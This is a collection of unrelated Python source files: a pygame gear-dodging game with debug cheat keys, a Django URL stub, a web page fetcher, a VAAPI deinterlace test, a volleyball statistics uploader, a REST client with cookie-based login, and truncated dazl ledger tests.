                if self.turn > 0 and self.turn <= 4:
                    self.rect_x.append(self.cp_x - (math.cos(math.radians(angle[z])) * self.cirRadius))
                    self.rect_y.append(self.cp_y + (math.sin(math.radians(angle[z])) * self.cirRadius))
                if self.turn > 4 and self.turn <= 8:
                    self.rect_x.append(self.cp_x + (math.cos(math.radians(angle[z+4])) * self.cirRadius))
                    self.rect_y.append(self.cp_y + (math.sin(math.radians(angle[z+4])) * self.cirRadius))
                if self.turn > 8 and self.turn <= 12:
                    self.rect_x.append(self.cp_x + (math.cos(math.radians(angle[z])) * self.cirRadius))
                    self.rect_y.append(self.cp_y - (math.sin(math.radians(angle[z])) * self.cirRadius))
                if self.turn > 12 and self.turn <= 16:
                    self.rect_x.append(self.cp_x - (math.cos(math.radians(angle[z+4])) * self.cirRadius))
                    self.rect_y.append(self.cp_y - (math.sin(math.radians(angle[z+4])) * self.cirRadius))
                self.turn += 1
        # Close the loop back to the first waypoint.
        self.rect_x.append(self.rect_x[0])
        self.rect_y.append(self.rect_y[0])
        print("Check 2")
        # Per-segment step deltas, scaled by smoothness and level speed.
        for c in range(0, 16):
            self.change_x.append(((self.rect_x[c+1] - self.rect_x[c]) / self.smoothness) * speed)
            self.change_y.append(((self.rect_y[c+1] - self.rect_y[c]) / self.smoothness) * speed)
        print(str(speed))
        print("Check 3")
        # Current position along the path and active segment index.
        self.gear_x = self.rect_x[0]
        self.gear_y = self.rect_y[0]
        self.number = 0
        #Rotation Stuff
        self.rot = 0
        self.rot_speed = random.randrange(-30, 30)
        self.last_update = pygame.time.get_ticks()
    def rotate(self):
        # Re-rotate at most every 50 ms, keeping the sprite centred.
        now = pygame.time.get_ticks()
        if now - self.last_update > 50: #In milliseconds
            self.last_update = now
            self.rot = (self.rot + self.rot_speed) % 360
            new_image = pygame.transform.rotate(self.image_orig, self.rot)
            old_center = self.rect.center
            self.image = new_image
            self.rect = self.image.get_rect()
            self.rect.center = old_center
    def update(self):
        self.rotate()
        global ballSpeed
        # Advance along the current segment; ballSpeed divides the step,
        # so larger ballSpeed means slower gears.
        self.gear_x += self.change_x[self.number] / ballSpeed
        self.gear_y += self.change_y[self.number] / ballSpeed
        self.rect.x = self.gear_x
        self.rect.y = self.gear_y
        # The waypoint-reached test differs per quadrant because the
        # direction of travel (sign of dx/dy) differs.
        if self.number <= 4 and self.number >= 0:
            if self.gear_x >= self.rect_x[self.number + 1] and self.gear_y >= self.rect_y[self.number + 1]:
                self.number += 1
        if self.number <= 9 and self.number > 4:
            if self.gear_x >= self.rect_x[self.number + 1] and self.gear_y <= self.rect_y[self.number + 1]:
                self.number += 1
        if self.number <= 13 and self.number > 9:
            if self.gear_x <= self.rect_x[self.number + 1] and self.gear_y <= self.rect_y[self.number + 1]:
                self.number += 1
        if self.number <= 16 and self.number > 13:
            if self.gear_x <= self.rect_x[self.number + 1] and self.gear_y >= self.rect_y[self.number + 1]:
                self.number += 1
        # Completed the loop: snap back to the first waypoint.
        if self.number >= 16:
            self.number = 0
            self.gear_x = self.rect_x[0]
            self.gear_y = self.rect_y[0]
        #print("UPDATE")
#---------------------------------LEVEL CLASS-----------------------LEVEL CLASS----------------------------------
class Level(pygame.sprite.Sprite):
    """Level progression: raises difficulty, awards score, and spawns a
    new gear each time the player reaches the door."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)

    def nextLevel(self):
        """Advance one level: bump speed bounds, award score, spawn a gear."""
        global levelNum
        levelNum += 1
        print("Done" + str(levelNum))
        global speed1
        global speed2
        speed1 += 10
        speed2 += 10
        print(speed1)
        print(speed2)
        global playerSpeed
        if levelNum > 11:
            # Give the player a small speed boost at high levels.
            playerSpeed += 0.5
        global backNum
        backNum = random.randrange(0, len(back))
        global clicked
        # Gear speed is a random value in [speed1/100, speed2/100).
        speed = float(decimal.Decimal(random.randrange(speed1, speed2))/100)
        global scoreModifier
        global score
        print("Speed " + str(speed))
        if speed > 0.4:
            # Fast levels are worth proportionally more points.
            scoreModifier += int(45 * speed)
            print("Speed Modifier " + str(int(45*speed)))
        score += scoreModifier
        b = Ball(speed)
        all_sprites.add(b)
        balls.add(b)
        # Reset the (module-level) player sprite to its start position.
        Player.__init__()

    def nextBack(self):
        """Blit the background selected by nextLevel.

        Fix: the original always loaded back[0], ignoring the random
        `backNum` chosen in nextLevel; fall back to 0 if nextLevel has
        not run yet.
        """
        idx = globals().get('backNum', 0)
        self.background = pygame.image.load(os.path.join(MySpritesFolder, back[idx])).convert_alpha()
        self.back_rect = self.background.get_rect()
        screen.blit(self.background, self.back_rect)
#---------------------------------LEVEL DOOR CLASS-----------------------LEVEL DOOR CLASS----------------------------------
class levelDoor(pygame.sprite.Sprite):
    """Exit door on the left edge; touching it advances to the next level.
    Also draws the current level number at the top of the screen."""

    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        door_image = pygame.image.load(os.path.join(MySpritesFolder, "levelDoor.jpg"))
        self.image = door_image.convert()
        self.image.set_colorkey(WHITE)
        self.rect = self.image.get_rect()
        self.rect.top = doorHeight
        self.rect.x = 100
        self.radius = int(self.rect.width * .85 / 2)
        # Level label, centred near the top of the window.
        label = myfont.render("Level " + str(levelNum), False, BLACK)
        screen.blit(label, (width/2 - 50, height / 100))
#---------------------------------GAME OVER CLASS-----------------------GAME OVER CLASS----------------------------------
class gameOver(pygame.sprite.Sprite):
    """Draws the game-over text and resets all gameplay globals so the
    next run starts fresh.

    NOTE(review): pygame.sprite.Sprite.__init__ is never called; this
    object is never added to a sprite group, so it currently works, but
    confirm before adding it to a group.
    """
    def __init__(self):
        global levelNum
        self.textSurface = myfont.render("Game Over", False, BLACK)
        screen.blit(self.textSurface,(width/2,height/2))
        self.textSurface = myfont.render("You made it to level " + str(levelNum), False, BLACK)
        screen.blit(self.textSurface,(width/2,height/2 + 100))
        self.textSurface = myfont.render("Press R to Retry", False, BLACK)
        screen.blit(self.textSurface,(width/2,height/2 + 200))
        #global levelNum
        global speed
        global speed1
        global speed2
        global playerNum
        global playerSpeed
        global beforeSpeed
        global gear
        global ballSpeed
        global score
        global scoreModifier
        # Reset every tunable back to its initial value.
        score = 0
        scoreModifier = 50
        ballSpeed = 1
        playerSpeed = beforeSpeed
        levelNum = 0
        speed = 0
        speed1 = 10
        speed2 = 20
        # Restore the full gear list (CTRL+T cheat may have shrunk it).
        gear = ["gear.png", "gear1.png", "gear2.png", "gear3.png", "gear4.png", "gear5.png", "gear6.png"]
        # Clear all gears from play.
        all_sprites.remove(balls)
        balls.remove(balls)
        playerNum = 0
#---------------------------------HIGH SCORE CLASS-----------------------HIGH SCORE CLASS----------------------------------
class highScore(pygame.sprite.Sprite):
    """Renders the current score and high score in the top corners."""
    def __init__(self):
        pygame.sprite.Sprite.__init__(self)
        global highscore
        self.textSurface = myfont.render("HighScore: " + str(highscore), False, BLACK)
        screen.blit(self.textSurface,(width/2 + (width/5), height/100))
        global score
        self.textSurface = myfont.render("Score: " + str(score), False, BLACK)
        screen.blit(self.textSurface,(width/2 - ((width/5)+100), height/100))
    def update(self):
        global highscore
        global levelNum
        # NOTE(review): this increments by 1 per frame instead of doing
        # `highscore = score` -- presumably a deliberate count-up effect,
        # but confirm; at 120 FPS the high score lags the real score.
        if score > highscore:
            highscore += 1
#---------------------------------CHEATS CLASS-----------------------CHEATS CLASS----------------------------------
class cheats(pygame.sprite.Sprite):
    """Debug hotkeys (all CTRL+key): level skip, clear gears, player and
    gear speed tweaks, and an on-screen help menu (CTRL+M)."""
    def update(self):
        pygame.sprite.Sprite.update(self)
        self.keystate = pygame.key.get_pressed()
        global clicked
        global playerSpeed
        # CTRL+L: skip to the next level.
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_l] and clicked==False:
            Level.nextLevel()
            time.sleep(0.150)  # debounce so one press skips one level
        # CTRL+C: remove every gear from play.
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_c]:
            all_sprites.remove(balls)
            balls.remove(balls)
        # CTRL+E / CTRL+Q / CTRL+R: raise / lower / reset player speed.
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_e]:
            playerSpeed += 0.5
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_q]:
            playerSpeed -= 0.5
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_r]:
            playerSpeed = beforeSpeed
        # CTRL+T: swap all gears for small ones, respawning the same count.
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_t]:
            global gear
            gear = ["gear5.png", "gear6.png"]
            all_sprites.remove(balls)
            amtBalls = len(balls)
            balls.remove(balls)
            global speed1
            global speed2
            global speed
            global b
            for ba in range(amtBalls):
                speed = float(decimal.Decimal(random.randrange(speed1, speed2))/100)
                b = Ball(speed)
                all_sprites.add(b)
                balls.add(b)
        # CTRL+F / CTRL+G / CTRL+H: slow / speed up / reset gear movement
        # (ballSpeed divides the per-frame step, so larger = slower).
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_f]:
            global ballSpeed
            ballSpeed += 0.2
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_g]:
            # global ballSpeed
            ballSpeed -= 0.05
            if ballSpeed <= 0:
                ballSpeed = 1
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_h]:
            # global ballSpeed
            ballSpeed = 1
        # CTRL+M: render the cheat-menu help text.
        if self.keystate[pygame.K_LCTRL] and self.keystate[pygame.K_m]:
            self.textSurface = myfont.render("Cheat Menu:", False, BLACK)
            screen.blit(self.textSurface,(10,0))
            self.textSurface = myfont.render("CTRL + L: Next Level", False, BLACK)
            screen.blit(self.textSurface,(10,50))
            self.textSurface = myfont.render("CTRL + C: Clear Gears", False, BLACK)
            screen.blit(self.textSurface,(10,100))
            self.textSurface = myfont.render("CTRL + E/Q/R: Increase/Decrease/Default Player Speed", False, BLACK)
            screen.blit(self.textSurface,(10,150))
            self.textSurface = myfont.render("CTRL + T: All Gears Small", False, BLACK)
            screen.blit(self.textSurface,(10,200))
            self.textSurface = myfont.render("CTRL + F/G/H: Decrease/Increase/Default Gear Speed", False, BLACK)
            screen.blit(self.textSurface,(10,250))
# --- Sprite groups, singletons, and the main loop -----------------------
all_sprites = pygame.sprite.Group()
#balls = pygame.sprite.Group()
homescreen = pygame.sprite.Group()  # rebound to a homeScreen instance below
highscores = pygame.sprite.Group()
balls = pygame.sprite.Group()
levels = pygame.sprite.Group()
levelDoors = pygame.sprite.Group()
l = levelDoor()
levelDoors.add(l)
all_sprites.add(l)
# NOTE: the class names are rebound to single instances here; later code
# calls e.g. Level.nextLevel() on the instance, not the class.
Player = Player()
Level = Level()
gameOver = gameOver()
all_sprites.add(Player)
h = highScore()
c = cheats()
#all_sprites.add(c)
#all_sprites.add(h)
##all_sprites.add(gameOver)
running = True
while running:
    # Handle window close and the Escape key.
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
        elif event.type == pygame.KEYDOWN:
            if event.key == pygame.K_ESCAPE:
                running = False
    if homeScreenMode[0]:
        # Title flow: show the player picker once Enter/Space was pressed
        # (homeScreen.update removes False from pickPlayer).
        if pickPlayer[0]:
            homescreen.choosePlayer()
        else:
            homeScreen()
            homescreen = homeScreen()
            homescreen.update()
    if homeScreenMode[0] == False:
        # Gameplay frame: redraw HUD, advance sprites, check collisions.
        screen.fill(WHITE)
        #Level.nextBack()
        l.__init__()   # re-blits the door and level label each frame
        h.__init__()   # re-blits the score / high-score text each frame
        h.update()
        all_sprites.update()
        c.update()
        # Circle-collision with any gear ends the run.
        hits = pygame.sprite.spritecollide(Player, balls, False, pygame.sprite.collide_circle)
        if hits:
            gameOver.__init__()  # draws game-over text and resets globals
            time.sleep(2)
            homeScreenMode = [True, False]
            pickPlayer =[False, True]
            #running = False
        # Reaching the door advances to the next level.
        hitDoor = pygame.sprite.spritecollide(Player, levelDoors, pygame.sprite.collide_circle, pygame.sprite.collide_circle)
        if hitDoor:
            Level.nextLevel()
    all_sprites.draw(screen)
    Clock.tick(FPS)
    pygame.display.flip()
pygame.quit()
|
from django.urls import path
from users import views as user_views
# URL namespace for reversing, e.g. reverse('users:<name>').
app_name = 'users'
# No routes registered yet; add path(...) entries here.
urlpatterns = [
]
|
"""This is module for fetching the source code of a page when provided
with a url, this module uses request module. Using this module you
can get the html text of page or binary response depending upon
your requirements. This module also keep track of the url of page you
are accessing, (this can be used to check any redirection) which can
accessed by calling get_base_url or get_base_hostname method. This
module handles exceptions thrown by request module and comes with
stand by support mechanism in case of network failure"""
from urlparse import urlparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from retrying import retry
import eventlet
class GetSource:
def __init__(self):
self.base_url = None
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
eventlet.monkey_patch()
def get_base_url(self):
return self.base_url
def get_base_hostname(self):
return urlparse(self.base_url).hostname
@staticmethod
def set_header():
hdr = {'User-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:12.0)'
' Gecko/20100101 Firefox/21.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;'
'q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1, utf-8; q=0.7,*; q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.8'}
return hdr
@retry(wait_random_min=2000, wait_random_max=10000)
def wait_for_connection(self):
with eventlet.Timeout(10, False):
test = requests.get('http://216.58.197.46',
timeout=5, verify=False)
test.raise_for_status()
print "\nResuming\n"
return
# retry if HTTP error or connection error occurs
# delay between consecutive retries is between 5 to 10 seconds
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_text(self, url):
hdr = GetSource.set_header()
html_file = None
try:
with eventlet.Timeout(10, False):
html_file = requests.get(url, headers=hdr, verify=False)
if html_file is None:
raise requests.RequestException()
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
# openSSL can be used to bypass the SSL layer
print "SSLError exception caught"
return None
except AttributeError:
pass
except requests.exceptions.ConnectionError:
# checking for bad connection
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
if html_file is not None:
return html_file.text
else:
return None
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_binary_response(self, url):
hdr = GetSource.set_header()
html_file = None
try:
html_file = None
with eventlet.Timeout(10, False):
html_file = requests.get(url, headers=hdr, verify=False)
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
# openSSL can be used to deal with SSL Error
print "SSLError exception caught"
except requests.exceptions.ConnectionError:
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
return html_file.content
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_text_with_params(self, url, payload):
# this method send requests with parameters in query to particular URL
# payloads is a dictionary comprising of key value pair
html_file = None
hdr = GetSource.set_header()
try:
with eventlet.Timeout(10, False):
html_file = requests.get(
url, headers=hdr, params=payload, verify=False)
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
print "SSLError exception caught"
except requests.exceptions.ConnectionError:
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
return html_file.text
@retry(stop_max_attempt_number=5, wait_random_min=2000,
wait_random_max=10000)
def get_html_binary_with_params(self, url, payload):
html_file = None
hdr = GetSource.set_header()
try:
with eventlet.Timeout(10, False):
html_file = requests.get(
url, headers=hdr, params=payload, verify=False)
self.base_url = html_file.url
html_file.raise_for_status()
except requests.exceptions.SSLError:
# check for https
print "SSLError exception caught"
except requests.exceptions.ConnectionError:
print "No Internet Connection!\nWaiting for connection"
self.wait_for_connection()
raise
return html_file.content
|
###
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
spec = load_test_spec("vpp", "deinterlace")
@slash.requires(have_ffmpeg)
@slash.requires(have_ffmpeg_vaapi_accel)
@slash.requires(*have_ffmpeg_filter("deinterlace_vaapi"))
@slash.parametrize(*gen_vpp_deinterlace_parameters(spec, ["bob", "weave", "motion-adaptive", "motion-compensated"]))
@platform_tags(VPP_PLATFORMS)
def test_default(case, method):
    """Deinterlace the spec *case* with ffmpeg's deinterlace_vaapi filter
    using *method*, then verify the decoded output against the metric."""
    params = spec[case].copy()
    # Map spec-level names onto ffmpeg/vaapi equivalents; tff is the
    # top-field-first flag, defaulting to 1 (top field first).
    params.update(
        method = map_deinterlace_method(method),
        mformat = mapformat(params["format"]),
        tff = params.get("tff", 1))
    if params["method"] is None:
        slash.skip_test("{} method not supported".format(method))
    params["decoded"] = get_media()._test_artifact(
        "{}_deinterlace_{method}_{format}_{width}x{height}"
        ".yuv".format(case, **params))
    if params["mformat"] is None:
        slash.skip_test("{format} format not supported".format(**params))
    # rate=field emits one frame per field (doubles the frame rate).
    call(
        "ffmpeg -hwaccel vaapi -vaapi_device /dev/dri/renderD128 -v debug"
        " -f rawvideo -pix_fmt {mformat} -s:v {width}x{height} -top {tff}"
        " -i {source} -vf 'format=nv12,hwupload,deinterlace_vaapi=mode={method}"
        ":rate=field,hwdownload,format=nv12'"
        " -pix_fmt {mformat} -vframes {frames} -y {decoded}".format(**params))
    # Default to an md5 comparison when the spec gives no metric.
    params.setdefault("metric", dict(type = "md5"))
    check_metric(**params)
|
from readCSV import hashData, addToHash
from firebase import firebase
import operator
import itertools
firebase = firebase.FirebaseApplication('https://statgen-993f4.firebaseio.com/')
# CSV column indices for each tracked volleyball stat.
kills = 4
errors = 6
assists = 9
aces = 11
digs = 13
blocksSolo = 15
blocksAss = 16
# Each teams hashtable
calgaryRoster = hashData("calgaryData.csv")
trinityWesternRoster = hashData("trinityWesternData.csv")
albertaRoster = hashData("albertaData.csv")
brandonRoster = hashData("brandonData.csv")
grantMacewanRoster = hashData("macewanData.csv")
manitobaRoster = hashData("manitobaData.csv")
mountRoyalRoster = hashData("mountRoyalData.csv")
saskatchewanRoster = hashData("saskatchewanData.csv")
thompsonRiversRoster = hashData("thompsonRiversData.csv")
ubcRoster = hashData("ubcData.csv")
ubcOkanaganRoster = hashData("ubcOkanaganData.csv")
winnipegRoster = hashData("winnipegData.csv")
# Order must match the `schools` abbreviation list in putData().
teams = [calgaryRoster,trinityWesternRoster,albertaRoster,brandonRoster,grantMacewanRoster,manitobaRoster
        ,mountRoyalRoster,saskatchewanRoster,thompsonRiversRoster,ubcRoster,ubcOkanaganRoster,winnipegRoster]
def calcStatsList(schoolRoster, playerName):
    """Return [kills, assists, aces, digs, blocksSolo, blocksAssists,
    errors, position] totals for *playerName* in *schoolRoster*.

    Roster rows differ in layout: some include the player's year, which
    shifts every stat column right by one and moves the position field.
    The original duplicated the seven stat lookups across three branches;
    this version computes a column offset and position index once.
    """
    row = schoolRoster[playerName]
    if (row[1] == 'f') and not (isinstance(row[2], int)) and (row[2] != "-"):
        # Year listed: position at index 2, stat columns shifted by one.
        offset, position_index = 1, 2
    elif row[1] == 'f':
        # No year: position at index 0, stat columns unshifted.
        offset, position_index = 0, 0
    else:
        # Default layout: position at index 1, stat columns unshifted.
        offset, position_index = 0, 1
    playerPosition = row[position_index]
    stat_columns = [kills, assists, aces, digs, blocksSolo, blocksAss, errors]
    allStats = [row[column + offset] for column in stat_columns]
    allStats.append(playerPosition)
    return allStats
def putData():
    """Compute per-player stat lists for every team and (when the put is
    uncommented) push them to Firebase under /playerData/<school>."""
    # Abbreviations; order must match the module-level `teams` list.
    schools = ['UC','TWU','UAB','BU','GMU','MAN','MRU','SASK','TRU','UBC','UBCO','WPG']
    for school, roster in zip(schools, teams):
        for player in roster:
            try:
                playerStats = calcStatsList(roster, player)
                #print(player, playerStats)
                # result =firebase.put(('/playerData/'+school), player, {'position':str(playerStats[7]),'killsTOT':str(playerStats[0]),'assistsTOT':str(playerStats[1]),'acesTOT':str(playerStats[2]),\
                # 'digsTOT': str(playerStats[3]), 'blocks soloTOT': str(playerStats[4]), 'blocks assistsTOT': str(playerStats[5]), 'errorsTOT': str(playerStats[6])})
            except TypeError:
                # Deliberate best-effort: skip malformed roster rows.
                pass
putData()
|
import base64
import httplib2
import logging
import mimetypes
import mimetools
import urllib, urllib2
import cookielib
import urlparse
import os, time, stat
import getpass
HTTP_STATUS_OK = '200'
logger = logging.getLogger(__name__)
class RestClient(object):
    """Thin REST client: delegates HTTP to a Connection and converts
    payloads via _serialize/_deserialize (overridden by subclasses).

    (Python 2 module: uses `unicode`.)
    """
    # MIME type sent with request bodies; None = plain text.
    content_type = None
    def __init__(self, base_url, username=None, password=None,
                 connection_class=None, **kwargs):
        if connection_class is None:
            connection_class = Connection
        self._connection = connection_class(base_url, username, password,
                                            **kwargs)
    def get(self, resource, args=None, data=None, headers=None):
        return self._request(resource, 'get', args=args, data=data,
                             headers=headers)
    def put(self, resource, args=None, data=None, headers=None):
        return self._request(resource, 'put', args=args, data=data,
                             headers=headers)
    def delete(self, resource, args=None, data=None, headers=None):
        return self._request(resource, 'delete', args=args, data=data,
                             headers=headers)
    def post(self, resource, args=None, data=None, headers=None):
        return self._request(resource, 'post', args=args, data=data,
                             headers=headers)
    def _request(self, resource, method, args=None, data=None, headers=None):
        """Serialize *data*, issue the request, and wrap the reply in a
        Response; on HTTP 403 the cached ~/.ocu login cookie is dropped
        so the next run re-authenticates."""
        response_data = None
        request_body = self._serialize(data)
        try:
            response = self._connection.request(resource, method, args=args,
                                                body=request_body, headers=headers,
                                                content_type=self.content_type)
            response_content = response.read()
        except Exception as e:
            if (hasattr(e,"code") and e.code == 403):
                if (os.path.isfile(os.path.expanduser("~/.ocu"))):
                    os.remove(os.path.expanduser("~/.ocu"))
            raise e
        response_headers = response.info().items()
        # Only deserialize successful replies; errors keep data=None.
        if response.code == 200:
            response_data = self._deserialize(response_content)
        return Response(response_headers, response_content, response_data,status_code=response.code)
    def _serialize(self, data):
        # Default: plain text (py2 unicode); subclasses override.
        return unicode(data)
    def _deserialize(self, data):
        return unicode(data)
class JsonRestClient(RestClient):
    """REST client that sends and receives application/json payloads."""
    content_type = 'application/json'

    @staticmethod
    def _json_module():
        """Return the best available json module (simplejson preferred).

        The original duplicated this try/except import fallback in both
        _serialize and _deserialize; it now lives in one place.
        """
        try:
            import simplejson as json
        except ImportError:
            try:
                import json
            except ImportError:
                raise RuntimeError('simplejson not installed')
        return json

    def _serialize(self, data):
        """Encode *data* as JSON; falsy data serializes to None."""
        if data:
            return self._json_module().dumps(data)
        return None

    def _deserialize(self, data):
        """Decode a JSON body; falsy bodies deserialize to None."""
        if data:
            return self._json_module().loads(data)
        return None
class XmlRestClient(RestClient):
    """REST client variant that tags requests as text/xml (payload
    conversion still uses the base class's plain-text behaviour)."""
    content_type = 'text/xml'
class Response(object):
    """Value object for an HTTP reply: headers, raw content, parsed data,
    and an integer status code."""

    def __init__(self, headers, content, data, status_code=500):
        self.headers = headers
        self.content = content
        self.data = data
        # The status may arrive as a string (e.g. '200'); normalise it.
        self.status_code = int(status_code)

    def __repr__(self):
        return '<Response %s: %s>' % (self.status_code, self.__dict__)
class BaseConnection(object):
    """Shared plumbing for HTTP connections: splits the base URL into
    scheme/host/path and guesses upload content types."""

    def __init__(self, base_url, username=None, password=None):
        self.base_url = base_url
        self.username = username
        self.password = password
        self.url = urlparse.urlparse(base_url)
        scheme, netloc, path, _query, _fragment = urlparse.urlsplit(base_url)
        self.scheme = scheme
        self.host = netloc
        self.path = path

    def _get_content_type(self, filename):
        """Guess a MIME type from *filename*, defaulting to octet-stream."""
        guessed, _encoding = mimetypes.guess_type(filename), None
        return guessed[0] or 'application/octet-stream'

    def request(self, resource, method="get", args=None, body=None,
                headers=None, content_type=None):
        # Transport-specific subclasses must implement the actual request.
        raise NotImplementedError
class Connection(BaseConnection):
    """urllib2-based connection with cookie persistence (~/.ocu), optional
    Django form login (CSRF-aware), and optional API-token auth.

    (Python 2 module: urllib2, cookielib, print statements, 0600 octal.)
    """
    # Extra headers merged into every request.
    _headers={}
    _csrf_token = None
    _token = None
    _login_url = None
    def __init__(self, *args, **kwargs):
        cache = kwargs.pop('cache', None)
        # NOTE(review): pops 'cache' a second time -- probably meant
        # 'timeout'; the value is unused either way. Confirm intent.
        timeout = kwargs.pop('cache', None)
        proxy_info = kwargs.pop('proxy_info', None)
        login_url = kwargs.pop('login_url', None)
        self._login_url = login_url
        token = kwargs.pop('token', None)
        super(Connection, self).__init__(*args, **kwargs)
        #remove cookie if it's older than an hour
        if (os.path.isfile(os.path.expanduser("~/.ocu"))
            and (time.time() - os.stat(os.path.expanduser("~/.ocu"))[stat.ST_MTIME]) > 3600):
            os.remove(os.path.expanduser("~/.ocu"))
        cj = cookielib.LWPCookieJar()
        # Reuse a previously saved login cookie when one exists.
        if (login_url and os.path.isfile(os.path.expanduser("~/.ocu"))):
            cj.load(os.path.expanduser("~/.ocu"))
        self._conn = urllib2.build_opener(
            urllib2.HTTPCookieProcessor(cj)
            ,urllib2.HTTPRedirectHandler()
            ,urllib2.HTTPHandler(debuglevel=0)
            )
        #API token
        if (token):
            self._token = token
        # No cached cookie: perform an interactive Django form login,
        # scraping the CSRF token from the login page with lxml.
        if (login_url and not os.path.isfile(os.path.expanduser("~/.ocu"))):
            username = getpass.getuser()
            password = getpass.getpass()
            from lxml import html
            login_form = self._conn.open(login_url).read()
            self._csrf_token = html.fromstring(login_form).xpath(
                '//input[@name="csrfmiddlewaretoken"]/@value')[0]
            values = {
                'this_is_the_login_form': 1,
                'username': username,
                'password': password,
                'csrfmiddlewaretoken': self._csrf_token,
                'next': '/admin/'
            }
            params = urllib.urlencode(values)
            req = urllib2.Request(login_url, params)
            req.add_header('Referer', login_url)
            #print("{0} {1}".format(login_url, params))
            try:
                #login_page = self._conn.open(login_url, params)
                login_page = self._conn.open(req)
            except Exception as e:
                import traceback
                print traceback.print_exc()
            # Persist the session cookie, readable only by the owner.
            cj.save(os.path.expanduser("~/.ocu"))
            os.chmod(os.path.expanduser("~/.ocu"),0600)
        else:
            # Cookie reused: recover the CSRF token from the jar.
            for i in cj:
                if (i.name == "csrftoken"):
                    self._csrf_token = i.value
    def request(self, resource, method, args=None, body=None, headers=None,
                content_type=None):
        """Issue *method* on *resource*, encoding *args* into the query
        string (GET) or a form body (PUT/POST), and attaching CSRF and
        API-token headers as needed. Returns the urllib2 response."""
        if headers is None:
            headers = {}
        if (self._headers):
            headers = dict(headers.items() + self._headers.items())
        params = None
        path = resource
        headers['User-Agent'] = 'Basic Agent'
        BOUNDARY = mimetools.choose_boundary()
        CRLF = u'\r\n'
        if body:
            if not headers.get('Content-Type', None):
                headers['Content-Type'] = content_type or 'text/plain'
            headers['Content-Length'] = str(len(body))
        else:
            # No body: let urllib2 compute the length itself.
            if 'Content-Length' in headers:
                del headers['Content-Length']
            headers['Content-Type'] = 'text/plain'
        if args:
            if (self._token):
                args["token"] = self._token
            if method == "get":
                path += u"?" + urllib.urlencode(args)
            elif method == "put" or method == "post":
                if (isinstance(args, dict) and self._csrf_token):
                    headers["X-CSRFToken"] = self._csrf_token
                    #args["csrfmiddlewaretoken"] = self._csrf_token
                # args become a form-encoded body for write methods.
                headers['Content-Type'] = \
                    'application/x-www-form-urlencoded'
                body = urllib.urlencode(args)
        if (method == "delete"):
            headers["X-CSRFToken"] = self._csrf_token
        if (method == "post"):
            headers["X-CSRFToken"] = self._csrf_token
            headers['Referer'] = self._login_url
        request_path = []
        # Normalise the / in the url path
        if self.path != "/":
            if self.path.endswith('/'):
                request_path.append(self.path[:-1])
            else:
                request_path.append(self.path)
        if path.startswith('/'):
            request_path.append(path[1:])
        else:
            request_path.append(path)
        url = u"%s://%s%s" % (self.scheme, self.host,u'/'.join(request_path))
        request = urllib2.Request(url,headers=headers,data=body)
        if (method == "delete"):
            # urllib2 has no native DELETE; override the method hook.
            request.get_method = lambda: 'DELETE'
        if (self._token):
            request.add_header("X-Auth-Token", "{0}".format(self._token))
        return self._conn.open(request)
|
# Copyright (c) 2017-2023 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
from __future__ import annotations
from asyncio import ensure_future, gather, sleep
from typing import Sequence
import dazl
from dazl.ledger import CreateEvent
from dazl.ledger.aio import Connection
from dazl.prim import ContractData, Party
from dazl.testing import SandboxLauncher
import pytest
from tests.unit import dars
TEMPLATE = "Simple:OperatorNotification"
def payload(operator: Party, text: str) -> ContractData:
    """Build an OperatorNotification create-payload for *operator*."""
    return dict(operator=operator, theObservers=[], text=text)
@pytest.mark.asyncio
async def test_stream_with_initial_state_and_early_punchout(sandbox: SandboxLauncher) -> None:
    """Create six contracts first, then verify a stream reader can take
    just the first three (initial-state snapshot) and punch out cleanly."""
    async with dazl.connect(url=sandbox.url, admin=True) as conn:
        party_info, _ = await gather(
            conn.allocate_party(), conn.upload_package(dars.Simple.read_bytes())
        )
    # start a separate coroutine for injecting data into the ledger
    async with dazl.connect(url=sandbox.url, act_as=party_info.party) as conn:
        texts = ["Red", "Red", "Green", "Blue", "Blue", "Blue"]
        for text in texts:
            await conn.create(TEMPLATE, payload(party_info.party, text))
        some_texts = await first_three(conn)
        assert some_texts == texts[:3]
@pytest.mark.asyncio
async def test_stream_with_no_initial_state_and_early_punchout(sandbox: SandboxLauncher) -> None:
    """Start the stream reader on an empty ledger, then create contracts
    and verify it picks up the first three live events and punches out."""
    async with dazl.connect(url=sandbox.url, admin=True) as conn:
        party_info, _ = await gather(
            conn.allocate_party(), conn.upload_package(dars.Simple.read_bytes())
        )
    async with dazl.connect(url=sandbox.url, act_as=party_info.party) as conn:
        # kick off the scanning of three elements _before_ the ledger has any data in it
        fut = ensure_future(first_three(conn))
        # continue onwards, injecting data into the ledger
